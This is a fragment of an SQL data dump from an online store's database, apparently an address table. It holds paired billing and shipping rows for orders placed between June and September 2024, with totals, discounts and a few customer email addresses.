(443, 403, '2024-06-05 13:39:59', '2024-06-05 13:39:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(444, 403, '2024-06-05 13:39:59', '2024-06-05 13:39:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(445, 404, '2024-06-17 01:57:51', '2024-06-17 01:57:51', 99, 0, NULL, 'billing', 'alikee53616@5dub.lolcorp.online', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(446, 404, '2024-06-17 01:57:51', '2024-06-17 01:57:51', 99, 0, NULL, 'shipping', 'alikee53616@5dub.lolcorp.online', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(447, 405, '2024-07-30 16:51:30', '2024-07-30 16:51:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(448, 405, '2024-07-30 16:51:30', '2024-07-30 16:51:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(449, 406, '2024-07-31 13:14:51', '2024-07-31 13:14:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(450, 406, '2024-07-31 13:14:51', '2024-07-31 13:14:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(451, 407, '2024-07-31 19:34:30', '2024-07-31 19:34:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(452, 407, '2024-07-31 19:34:30', '2024-07-31 19:34:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(453, 408, '2024-08-01 03:06:51', '2024-08-01 03:06:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(454, 408, '2024-08-01 03:06:52', '2024-08-01 03:06:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(455, 409, '2024-08-01 05:09:56', '2024-08-01 05:09:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(456, 409, '2024-08-01 05:09:56', '2024-08-01 05:09:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(457, 410, '2024-08-02 01:57:58', '2024-08-02 01:57:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(458, 410, '2024-08-02 01:57:58', '2024-08-02 01:57:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(459, 411, '2024-08-02 04:11:50', '2024-08-02 04:11:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(460, 411, '2024-08-02 04:11:50', '2024-08-02 04:11:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(461, 412, '2024-08-02 12:08:39', '2024-08-02 12:08:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(462, 412, '2024-08-02 12:08:39', '2024-08-02 12:08:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(463, 413, '2024-08-02 14:47:29', '2024-08-02 14:47:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(464, 413, '2024-08-02 14:47:29', '2024-08-02 14:47:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(465, 414, '2024-08-03 09:20:04', '2024-08-03 09:20:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(466, 414, '2024-08-03 09:20:04', '2024-08-03 09:20:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(467, 415, '2024-08-03 17:46:05', '2024-08-03 17:46:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(468, 415, '2024-08-03 17:46:05', '2024-08-03 17:46:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(469, 416, '2024-08-04 00:18:21', '2024-08-04 00:18:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(470, 416, '2024-08-04 00:18:21', '2024-08-04 00:18:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(471, 417, '2024-08-05 17:01:20', '2024-08-05 17:01:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(472, 417, '2024-08-05 17:01:20', '2024-08-05 17:01:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(473, 418, '2024-08-06 13:38:57', '2024-08-06 13:38:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(474, 418, '2024-08-06 13:38:57', '2024-08-06 13:38:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(475, 419, '2024-08-09 09:29:31', '2024-08-09 09:29:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(476, 419, '2024-08-09 09:29:31', '2024-08-09 09:29:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(477, 420, '2024-08-13 03:35:01', '2024-08-13 03:35:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(478, 420, '2024-08-13 03:35:01', '2024-08-13 03:35:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(479, 421, '2024-08-14 00:20:56', '2024-08-14 00:20:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(480, 421, '2024-08-14 00:20:56', '2024-08-14 00:20:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(481, 422, '2024-08-15 06:18:34', '2024-08-15 06:18:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(482, 422, '2024-08-15 06:18:34', '2024-08-15 06:18:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(483, 423, '2024-08-19 18:32:08', '2024-08-19 18:32:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(484, 423, '2024-08-19 18:32:08', '2024-08-19 18:32:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(485, 424, '2024-09-17 12:18:09', '2024-09-17 12:18:09', 100, 0, NULL, 'billing', 'doris_nugentmeds@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(486, 424, '2024-09-17 12:18:09', '2024-09-17 12:18:09', 100, 0, NULL, 'shipping', 'doris_nugentmeds@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(487, 425, '2024-09-22 17:27:39', '2024-09-22 17:27:39', 101, 0, NULL, 'billing', 'joyce30compon06@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(488, 425, '2024-09-22 17:27:39', '2024-09-22 17:27:39', 101, 0, NULL, 'shipping', 'joyce30compon06@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
